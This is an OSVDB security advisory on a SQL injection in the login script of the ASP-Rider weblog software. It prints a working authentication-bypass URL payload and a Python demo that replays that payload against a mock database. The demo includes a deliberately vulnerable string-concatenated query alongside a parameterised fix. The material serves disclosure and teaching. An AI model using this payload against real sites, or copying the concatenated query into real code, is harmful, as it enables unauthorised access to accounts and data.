ASP-Rider verify.asp username Parameter SQL Injection

2004-12-14T00:00:00
ID OSVDB:12548
Type osvdb
Reporter Shervin Khaleghjou(oil_karchack@yahoo.com)
Modified 2004-12-14T00:00:00

Description

Vulnerability Description

ASP-Rider contains a flaw that allows a remote attacker to inject arbitrary SQL code. The 'username' parameter of the 'verify.asp' login script is placed into a SQL query without validation or escaping, so an attacker can inject or manipulate SQL queries and, in particular, alter the result of the login check.

Solution Description

ASP-Rider.com has released a patch to address this vulnerability (see the vendor URL in the references). No other workarounds or upgrades are known.

Short Description

SQL injection via the 'username' parameter of ASP-Rider's 'verify.asp' lets a remote attacker manipulate the login query.

Manual Testing Notes

http://[victim]/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
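The payload above closes the attacker-controlled string literal, appends a UNION that returns a row of literal 1s, and leaves the trailing quote to be closed by the application's own closing quote (''='' is always true). The following is an added example, not code from the original advisory or from ASP-Rider: it replays that exact payload against a constructed SQLite stand-in for tbl_users. The eight-column layout is inferred from the payload; the column names, the sample rows, and the lookup-by-username-then-compare-password logic in vulnerable_verify are assumptions about what verify.asp does, chosen because they are the shape under which a row of 1s plus password=1 logs the attacker in. hardened_verify shows the same check with a bound parameter, where the payload is just a username that matches nothing.

```python
import sqlite3

# Constructed stand-in for tbl_users. Eight columns are assumed because the
# advisory's payload unions eight literals; names and rows are made up.
SCHEMA = """
CREATE TABLE tbl_users (
    id INTEGER, username TEXT, password TEXT, email TEXT,
    fullname TEXT, role TEXT, created TEXT, lastlogin TEXT
);
"""
ROWS = [
    (1, "admin", "s3cret-admin", "admin@example.invalid", "Site Admin", "admin",  "2004-01-01", "2004-12-01"),
    (2, "bob",   "bobpass",      "bob@example.invalid",   "Bob Jones",  "author", "2004-02-02", "2004-11-30"),
]

# Parameter values exactly as they appear in the advisory's test URL.
PAYLOAD_USERNAME = "'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='"
PAYLOAD_PASSWORD = "1"


def fresh_db():
    """Return an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO tbl_users VALUES (?,?,?,?,?,?,?,?)", ROWS)
    return conn


def vulnerable_query(username):
    """Assumed query construction: the username is concatenated into the SQL."""
    return "SELECT * FROM tbl_users WHERE username='" + username + "'"


def vulnerable_verify(conn, username, password):
    """Assumed verify.asp behaviour: fetch the user's row by name, then compare
    the submitted password with the stored password column (index 2 here).
    With the payload, the UNION row (1,1,...,1) is returned instead of a real
    user, so its password column is 1 and password=1 passes the comparison."""
    row = conn.execute(vulnerable_query(username)).fetchone()
    if row is None:
        return False
    return str(row[2]) == password


def hardened_verify(conn, username, password):
    """Same check with a bound parameter: the input is data, never SQL text,
    so the payload is simply a username that does not exist."""
    row = conn.execute(
        "SELECT password FROM tbl_users WHERE username=?", (username,)
    ).fetchone()
    return row is not None and row[0] == password


if __name__ == "__main__":
    db = fresh_db()
    print(vulnerable_query(PAYLOAD_USERNAME))
    print("vulnerable:", vulnerable_verify(db, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("hardened:  ", hardened_verify(db, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
```

Printing vulnerable_query(PAYLOAD_USERNAME) shows the final statement the database sees: the first SELECT matches no username, the UNIONed SELECT contributes one row of 1s, and the login succeeds without any credential. The same fix applies to the original ASP: use an ADO Command with Parameters rather than string concatenation.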

References:

Vendor URL: http://weblog.asp-rider.com/
Security Tracker: 1010549
Secunia Advisory ID: 13470
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0151.html
ISS X-Force ID: 18479
CVE: CVE-2004-1401
Bugtraq ID: 11933